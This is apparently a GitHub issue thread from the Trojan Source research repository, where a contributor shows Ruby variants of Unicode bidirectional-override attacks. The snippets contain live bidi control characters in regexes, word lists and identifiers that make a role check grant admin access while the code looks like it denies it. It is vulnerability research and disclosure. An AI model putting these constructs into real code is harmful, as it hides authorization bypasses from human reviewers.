Variations on Stretched String #9

security-curious · 2021-11-05T02:02:06Z

This is a follow-up to my posting on #8, but creating a different issue as it is more focused on the variations on the stretched string than the early return or comment out.

You were correct that I didn't mention stretched string in #8 because I assumed it would work in Ruby as well. Stretched string doesn't really interest me that much though because as you noted in your paper:

there are other, perhaps simpler, ways that an adversary can cause a string comparison to fail without visual effect....such as the Zero Width Space

What might be nice if if we could use Bidi to not only cause a conditional to fail (just like ZWSP) but to cause the condition to pass. I don't think it is possible with a string but we could stretch other things in the language to achieve this. Your paper really only mentions comments and strings as allowing Unicode but depending on the grammer other tokens can have Unicode characters.

Below are three other types of stretching that allow us to evaluate a conditional to true instead of failing the conditional. I am using Ruby because I know it well, but I am guessing some of these could be applicable to other languages. If they are of interest perhaps we can improve the examples, see how they are applicable to other languages and include them with your examples. With all of these examples the syntax highlighting somewhat gives the issue away but perhaps in a big block of other code it wouldn't be noticed.

Stretched Regex

The most obvious alternative to a stretched string literal is a stretched regular expression. I work on a real-world application where the roles are stored as a comma-separated string for historical reasons. So an admin will have:

user.roles = 'admin,manager,user'

while a regular user might have just:

user.roles = 'user'

I could conceive of a method to see if the user is an admin defined as:

def admin?
  roles =~ /admin/
end

Using that as my example scenario consider the below impl:

class User
  attr_accessor :roles

  def admin?
    @roles =~ /admin⁧⁦|user/ #⁩⁦/ # Restrict from ⁩⁩
  end
end

user = User.new
user.roles = 'user,manager'

if user.admin?
  puts 'admin!'
else
  puts 'regular user :('
end

The comment seems a bit odd with the extra |, / and # characters. But none of that should matter since everything after the # should be ignored. If you run the above you would expect it to output regular user :( but instead it outputs admin!.

With more effort we might be able to reduce the extra characters in the comment. Also in Ruby you can choose your regex deliminators if you want. These are all equivalent:

/admin/
%r[admin]
%r!admin!

The ability to chose your deliminator might help you choose a character to appear in the comment that is more believable.

Stretched List

Another things we can stretch is a list of strings. In Ruby that is defined as:

%w[one two three four five six]

This is just a syntactical upgrade to:

['one', 'two', 'three', 'four', 'five', 'six']

As with regex we can choose our deliminator so this is also the same:

%w!one two three four five six!

Now we can inject into our list with Bidi:

role = 'User'
privileged = %w!Admin Manager⁧⁦ User! # ⁩⁦! # Don't include ⁩⁩
if privileged.include? role
  puts 'admin!'
else
  puts 'regular user :('
end

Here I am using that feature to choose my deliminator and picking ! to make the comment more believable. ! is not normally used so I could have also just made my comment say # Don't include User] # and someone might think it was just an extra character.

Stretched Identifiers

My final variation is to stretch a identifier. In Ruby a identifier can be made of unicode characters. For example:

😡 = 'Some error message'
STDERR.puts 😡

So lets put some of our Bidi control characters in our variable name:

role⁧⁦= 'Admin' #⁩⁦ # Condition will ensure 'User' !⁩⁦ = 'User'⁩⁩
if role⁧⁦ == 'Admin'
  puts 'admin!'
else
  puts 'regular user :('
end

There might be other things you can do with this besides assignment.

The text was updated successfully, but these errors were encountered:

olimpa · 2021-11-05T02:19:44Z

Ok

nickboucher · 2021-11-05T17:37:40Z

@security-curious This is absolutely fantastic!

These are all great points. In the Trojan Source paper, we focused on constructs that we knew to be present across many languages, which ultimately resolved to comments and string literal. Regex literals a clever extension of this in the languages that support them. Although this is not relevant to all major languages, it is relevant to some such as Ruby and (I suspect) JavaScript.

The stretched identifiers description is the most interesting to me, however. I'm shocked that Ruby allows control characters in identifier names...I suspect there's all sorts of adversarial things you can do with this. I like the stretched identifier example above quite a lot, and for those following along here's a visualization of the underlying encoding in @security-curious's example:

I'm entirely open to adding a Ruby/ directory in this repo containing relevant examples. @security-curious please feel free to make a PR with any examples that you would like, ideally following the format used for examples in other languages as closely as possible.

security-curious · 2021-11-05T18:48:26Z

If identifiers are what interests you keep in mind that I'm not just taking about variables. Modules, classes, constants, methods, etc. The below is a valid Ruby program:

module A📦
  class B🎓
    C💎 = 3.14

    def 🔴 r
      C💎 * r**2
    end
  end
end

puts A📦::B🎓.new.🔴 8

Constants must start with an uppercase letter. Hence the C before the 💎. Classes and modules in Ruby are just constants pointing to an instance of a module or class. So:

class A
end

Is the same as:

A = Class.new

This is the reason I needed to prefix the classes and modules with a uppercase letter but the remaining letters can be any unicode value. Methods and variables don't have that restriction. So while my example was about assigning a variable you might be able to do other trickery with method, class, constant and module names. Really any identifier.

I did reach out to the Ruby team regarding all this and they felt addressing this at the interpreter level was not the right solution. I guess there is a debate regarding "defense in depth" vs maintenance cost of playing wack-a-mole with odd Unicode characters. I can see both sides of the argument.

security-curious · 2021-11-06T15:38:46Z

Going to close this as well since I just wanted to bring up the alternatives to see if they are of interest. I might later add the Ruby PR as you suggested. In it I can include all the strategies your paper covered as applicable to Ruby as well as maybe some of these variations.

security-curious mentioned this issue Nov 6, 2021

Early return and comment out in languages without closing comment token? #8

Closed

security-curious closed this as completed Nov 6, 2021

security-curious mentioned this issue Nov 11, 2021

Add Ruby As a Vulnerable Language #15

Open

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Variations on Stretched String #9

Variations on Stretched String #9

security-curious commented Nov 5, 2021

olimpa commented Nov 5, 2021

nickboucher commented Nov 5, 2021

security-curious commented Nov 5, 2021

security-curious commented Nov 6, 2021

Variations on Stretched String #9

Variations on Stretched String #9

Comments

security-curious commented Nov 5, 2021

Stretched Regex

Stretched List

Stretched Identifiers

olimpa commented Nov 5, 2021

nickboucher commented Nov 5, 2021

security-curious commented Nov 5, 2021

security-curious commented Nov 6, 2021